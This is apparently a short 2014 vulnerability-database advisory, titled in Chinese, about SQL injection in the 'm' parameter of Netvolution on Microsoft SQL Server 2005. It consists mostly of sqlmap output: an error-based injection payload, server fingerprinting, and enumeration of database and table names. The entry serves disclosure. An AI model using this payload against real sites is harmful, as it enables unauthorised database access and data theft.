Netvolution 'm'参数SQL注入漏洞

🗓️ 07 Mar 2014 00:00:00Reported by RootType

SQL injection vulnerability in 'm' parameter of Netvolution with Microsoft SQL Server 2005 backen


                                                sqlmap output:

Place: Get
Parameter: m
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING
clause
    Payload: m=siteModules.evenCalendarAjax' AND
3829=CONVERT(INT,(SELECT CHAR(113)+CHAR(114)... CHAR(115)+CHAR(112)))
AND 'test'='test&amp;pid=33&amp;lang=2&amp;d=

[HH:MM:SS] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.5
back-end DBMS: Microsoft SQL Server 2005

[HH:MM:SS] [INFO] fetching database names
[HH:MM:SS] [INFO] the SQL query used returns 196 entries
[HH:MM:SS] [INFO] retrieved: A......
[HH:MM:SS] [INFO] retrieved: A......
[HH:MM:SS] [INFO] retrieved: A......
...
[HH:MM:SS] [INFO] fetching tables for databases: A...,A....,A... ...

07 Mar 2014 00:00Current

7.1High risk

Vulners AI Score7.1